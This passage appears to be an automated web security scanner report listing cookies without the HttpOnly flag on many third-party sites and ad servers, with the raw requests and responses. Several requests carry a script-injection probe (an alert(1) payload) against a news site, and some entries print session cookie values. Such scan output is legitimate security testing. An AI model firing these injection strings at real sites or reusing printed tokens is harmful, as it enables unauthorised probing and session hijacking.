TATravelInfo=V2*A.2*MG.-1*HP.2*FL.3*RVL.114150_33; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
TAUnique=%1%enc%3ApD%2BeiqxH3FFd8LGI8QbYY0XbcR4szT2MqK8w8U77pH43b9QLS6G90g%3D%3D; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
BEPIN=%1%12de72abfc8%3Brev08a%3A8754%3Bmed02a%3A8739%3Bbak05a%3A5465%3Busr02a%3A8737%3Bbak02a%3A9090%3B; Domain=.tripadvisor.com; Path=/
CM=%1%SubPopup%2C%2C-1%7CSubSessionPopup%2C1%2C-1%7Csh%2C%2C-1%7CWShadeSeen%2C%2C-1%7C; Domain=.tripadvisor.com; Expires=Sat, 30-Jan-2021 16:18:14 GMT; Path=/
TAReturnTo=%1%%2FHotel_Review-g60745-d114150-Reviews-Millennium_Bostonian_Hotel-Boston_Massachusetts.html; Domain=.tripadvisor.com; Path=/

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.195. http://www.trw.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.trw.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SESSec9a802c73b09f70b19df80cd6286d02=kdi10q8smc5gnbf5onr9ocvdj0; expires=Sat, 26 Feb 2011 07:39:57 GMT; path=/; domain=.trw.com

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.trw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.196. http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.viper007bond.com
Path:	/wordpress-plugins/vipers-video-quicktags/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=bbd6c58a551246b940256f97b64adb9b; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /wordpress-plugins/vipers-video-quicktags/ HTTP/1.1
Host: www.viper007bond.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.197. http://www.webveteran.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.webveteran.com
Path:	/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

CFID=8274078;expires=Fri, 25-Jan-2041 16:18:06 GMT;path=/
CFTOKEN=6e10d540d2ad2506-07AAEE68-5056-A306-AFB2AD5DA2DEAF48;expires=Fri, 25-Jan-2041 16:18:06 GMT;path=/

The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET / HTTP/1.1
Host: www.webveteran.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 16:18:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: CFID=8274078;expires=Fri, 25-Jan-2041 16:18:06 GMT;path=/
Set-Cookie: CFTOKEN=6e10d540d2ad2506-07AAEE68-5056-A306-AFB2AD5DA2DEAF48;expires=Fri, 25-Jan-2041 16:18:06 GMT;path=/
Set-Cookie: SKIP=1;expires=Wed, 09-Feb-2011 16:18:06 GMT;path=/
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="e
...[SNIP]...

12.198. http://www.wordpresstemplates.com/ previous next

Summary

Severity:	Low
Confidence:	Firm
Host:	http://www.wordpresstemplates.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

PHPSESSID=uf1lnmege12chjo60cjanrpo16; path=/

The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.wordpresstemplates.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Tue, 01 Feb 2011 21:35:08 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: PHP/5.2.9
X-Pingback: http://www.wordpresstemplates.com/xmlrpc.php
Set-Cookie: PHPSESSID=uf1lnmege12chjo60cjanrpo16; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

12.199. http://a.intentmedia.net/adServer/clicks previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.intentmedia.net
Path:	/adServer/clicks

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

intentmedia_user_id=f0de1dbf-3ef3-4076-9917-ad3e51bd5cda;Path=/;Expires=Wed, 25-Jul-12 15:29:52 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adServer/clicks HTTP/1.1
Host: a.intentmedia.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;

Response

HTTP/1.1 400 Bad Request
Cache-Control: must-revalidate,no-cache,no-store
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 01 Feb 2011 15:29:52 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=f0de1dbf-3ef3-4076-9917-ad3e51bd5cda;Path=/;Expires=Wed, 25-Jul-12 15:29:52 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 1384
Connection: Close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=ISO-8859-1"/>
<title>Error 400 BAD_REQUEST</title>
</head>
<body><h2>HTTP ERROR 400</h2>
<p>Problem accessing /adServer/clicks
...[SNIP]...

12.200. http://a.intentmedia.net/adServer/impressions previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a.intentmedia.net
Path:	/adServer/impressions

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;Path=/;Expires=Wed, 25-Jul-12 15:24:12 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adServer/impressions?product_category=hotels&site=ORBITZ_GLOBAL&time_zone_offset=360&rooms=1&travelers=2&travel_date_start=20110201&travel_date_end=20110202&submarket_id=11231&search_term=Boston%2C%20MA%2C%20United%20States&results_page_number=1&sort_order=BEST_VALUE&is_logged_in_user=N&is_registered_user=Y&cache_buster=1296573896115&travelers_in_room_one=2&ad_unit_id=2 HTTP/1.1
Host: a.intentmedia.net
Proxy-Connection: keep-alive
Referer: http://www.orbitz.com/shop/hotelsearch?type=hotel&hotel.typeOfSearch=keyword&hotel.locationKeywordInput.key=Boston%2C+MA%2C+United+States&hotel.locId=loc.pid%3A11231&hotel.locationAddressInput.addressInput.countryCode=US&hotel.locationAddressInput.addressInput.addressLine1=&hotel.locationAddressInput.addressInput.city=&hotel.locationAddressInput.addressInput.stateProvinceCode=&hotel.locationAddressInput.addressInput.postalCode=&hotel.hotelSearchDetails.checkinDate=02%2F01%2F11&hotel.hotelSearchDetails.checkoutDate=02%2F02%2F11&hotel.hotelSearchDetails.numberOfRooms=1&hotel.hotelSearchDetails.rooms%5B0%5D.numberOfAdults=2&hotel.hotelSearchDetails.rooms%5B1%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B2%5D.numberOfAdults=1&hotel.hotelSearchDetails.rooms%5B3%5D.numberOfAdults=1&hotel.hotelRating=&hotel.hotelChain=&hotel.hotelName=&hotel.couponCode=&search=Search
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/javascript; charset=ISO-8859-1
Date: Tue, 01 Feb 2011 15:24:12 GMT
Expires: Thu, 01 Jan 1970 00:00:00 GMT
P3P: policyref="/w3c/p3p.xml", CP="NOI NID CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI COM NAV INT"
Server: Jetty(6.1.17)
Set-Cookie: intentmedia_user_id=e6908583-79a9-4ea3-a0a2-86edabb110c5;Path=/;Expires=Wed, 25-Jul-12 15:24:12 GMT
Via: 1.1 a.intentmedia.net
Content-Length: 7378
Connection: keep-alive

try{if (IntentMedia) {IntentMedia.set_intentmedia_user_id('e6908583-79a9-4ea3-a0a2-86edabb110c5');IntentMedia.render_ads(2, {"ad_units":[{"ad_unit_style":"font-family: Arial, Helvetica, sans-serif; wi
...[SNIP]...

12.201. http://a9.com/-/spec/opensearch/1.1/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://a9.com
Path:	/-/spec/opensearch/1.1/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

a9locale=en_US; Domain=.a9.com; Path=/
a9Temp="{\"w\":\"g\"}"; Version=1; Domain=.a9.com; Path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /-/spec/opensearch/1.1/ HTTP/1.1
Host: a9.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 19:17:52 GMT
Server: Server
Content-Type: text/html; charset=utf-8
Content-Length: 2727
Set-Cookie: a9locale=en_US; Domain=.a9.com; Path=/
Set-Cookie: a9Temp="{\"w\":\"g\"}"; Version=1; Domain=.a9.com; Path=/
Vary: Accept-Encoding,User-Agent
Connection: close

<html>
<head>

<script language="javascript" type="text/javascript">
<!--
var a9IsIE7 = true;
var a9IsIE = true;
var a9IsMoz = false;
var a9IsSafari = false;
var a9IsOpera = false;

...[SNIP]...

12.202. http://ad-emea.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad-emea.doubleclick.net
Path:	/click

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|1984865/1006548/15007|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.203. http://ad.doubleclick.net/ad/N4492.MSN/B5014254.59 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N4492.MSN/B5014254.59

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c37ccbd32000070||t=1296715715|et=730|cs=dt-1jb2n; path=/; domain=.doubleclick.net; expires=Sat, 02 Feb 2013 06:48:35 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 02 Feb 2011 06:48:35 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.204. http://ad.doubleclick.net/ad/N553.126834.KONTERATECHNOLOGIES/B5039995 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/ad/N553.126834.KONTERATECHNOLOGIES/B5039995

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 14:46:15 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ad/N553.126834.KONTERATECHNOLOGIES/B5039995 HTTP/1.1
Host: ad.doubleclick.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

12.205. http://ad.doubleclick.net/adi/N3285.google/B2343920.91 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.91

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=cb3d6bd32000037||t=1296716221|et=730|cs=9el-dbvd; path=/; domain=.doubleclick.net; expires=Sat, 02 Feb 2013 06:57:01 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Wed, 02 Feb 2011 06:57:01 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.206. http://ad.doubleclick.net/adi/N3466.8451.ORBITZLLC/B4967866.3 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3466.8451.ORBITZLLC/B4967866.3

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=2244e57c0c01002a||t=1296573792|et=730|cs=pkhwecaq; expires=Thu, 31-Jan-2013 15:23:12 GMT; path=/; domain=.doubleclick.net

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Date: Tue, 01 Feb 2011 15:23:12 GMT
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/html; charset=ISO-8859-1
Set-Cookie: id=2244e57c0c01002a||t=1296573792|et=730|cs=pkhwecaq; expires=Thu, 31-Jan-2013 15:23:12 GMT; path=/; domain=.doubleclick.net
Set-Cookie: test_cookie=; domain=.doubleclick.net; path=/; Max-Age=0; expires=Mon, 21-July-2008 23:59:00 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Content-Length: 6715

<html><head><title>Advertisement</title></head><body bgcolor="#ffffff" style="margin:0px;">
<!-- Code auto-generated
...[SNIP]...

12.207. http://ad.doubleclick.net/adi/N4406.Orbitzcom/B5147944.4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N4406.Orbitzcom/B5147944.4

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 15:37:55 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.208. http://ad.doubleclick.net/adi/dmd.ehow/homepage previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/dmd.ehow/homepage

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=ca5f3b5320000b9||t=1296663503|et=730|cs=lv-flm96; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 16:18:23 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 16:18:23 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.209. http://ad.doubleclick.net/adj/dmd.ehow/gen previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/dmd.ehow/gen

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=c8b2db5320000e0||t=1296659579|et=730|cs=cn7-xujn; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 15:12:59 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 15:12:59 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.210. http://ad.doubleclick.net/click previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/click

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

id=ca5f3b5320000dd|1890937/408080/15007|t=1296663507|et=730|cs=woptkuft; path=/; domain=.doubleclick.net; expires=Fri, 01 Feb 2013 16:18:27 GMT
test_cookie=CheckForPermission; path=/; domain=.doubleclick.net; expires=Tue, 01 Feb 2011 16:18:27 GMT

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

12.211. http://ad.doubleclick.net/clk previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/clk

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

id=c653243310000d9|737194/848412/15006|t=1294099968|et=730|cs=gfdmbifc; path=/; domain=.doubleclick.net; expires=Thu, 03 Jan 2013 00:12:48 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

12.212. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:46:53 GMT; path=/
i_1=33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2; expires=Fri, 04-Mar-2011 21:46:53 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1392708374 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?6e5ec%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef4e8bec2fdd=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2|33:1411:782:100:0:34115:1296392450:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:46:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:46:53 GMT; path=/
Set-Cookie: i_1=33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2; expires=Fri, 04-Mar-2011 21:46:53 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

12.213. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:55 GMT; path=/
i_1=33:1391:261:95:0:38655:1296683335:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:48:55 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/1496386082 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?998d7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:48:55 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:55 GMT; path=/
Set-Cookie: i_1=33:1391:261:95:0:38655:1296683335:L|33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L; expires=Fri, 04-Mar-2011 21:48:55 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

12.214. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:15 GMT; path=/
i_1=33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L; expires=Fri, 04-Mar-2011 21:48:15 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/1391.0.img.TEXT/822821502 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Referer: http://money.msn.com/investing?998d7
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2

Response

HTTP/1.1 302 Found
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:48:15 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:15 GMT; path=/
Set-Cookie: i_1=33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L; expires=Fri, 04-Mar-2011 21:48:15 GMT; path=/
Location: http://admedia.wsod.com/media/p.gif
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 0

12.215. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:46:54 GMT; path=/
i_1=33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2; expires=Fri, 04-Mar-2011 21:46:54 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683213**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F6e5ec%2522%253E%253Cscript%253Ealert1%253C_@2Fscript%253Ef4e8bec2fdd%3D1?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=991035629&PG=INVSRQ&ASID=cb0b7f4255734b4ba18190811d8f4ee6 HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2|33:1391:261:95:0:34115:1296410354:B2

Response

HTTP/1.1 200 OK
Server: nginx/0.6.39
Date: Wed, 02 Feb 2011 21:46:54 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PHP/5.1.6
Set-Cookie: u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:46:54 GMT; path=/
Set-Cookie: i_1=33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L|33:1411:992:100:0:34115:1296410365:B2; expires=Fri, 04-Mar-2011 21:46:54 GMT; path=/
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Length: 847

   function wsodOOBClick() {
       var i = new Image();
       i.src = 'http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=991035629&PG=INVSRQ&ASID=cb0b7f4255734b4ba18190811
...[SNIP]...

12.216. http://ad.wsod.com/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295** previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.wsod.com
Path:	/embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

u=4d2cdd9abba1d; expires=Sat, 05-Mar-2011 21:48:16 GMT; path=/
i_1=33:353:78:3:0:38655:1296683296:L|33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L; expires=Fri, 04-Mar-2011 21:48:16 GMT; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /embed/8bec9b10877d5d7fd7c0fb6e6a631357/353.0.js.120x30/1296683295**;10,1,103;1920;1200;http%3A_@2F_@2Fmoney.msn.com_@2Finvesting_@3F998d7?click=http://g.msn.com/_2AD0003L/93000000000038010.1?!&&PID=8010640&UIT=G&TargetID=28253488&AN=1377911769&PG=INVSRQ&ASID=2af8a7eb720e4efda85b7da3171198fc HTTP/1.1
Host: ad.wsod.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: c_1=33:967:555:0:0:36941:1294800536:L; o=1:1; i_34=8:45:5:7:0:38345:1296350886:L|8:47:27:7:0:32725:1294844800:B2; fp=599362::7:IN:::1296392421:1:33; u=4d2cdd9abba1d; i_1=33:1391:835:95:0:38655:1296683295:L|33:353:198:3:0:38655:1296683214:L|33:1391:835:95:0:38655:1296683213:L

Response

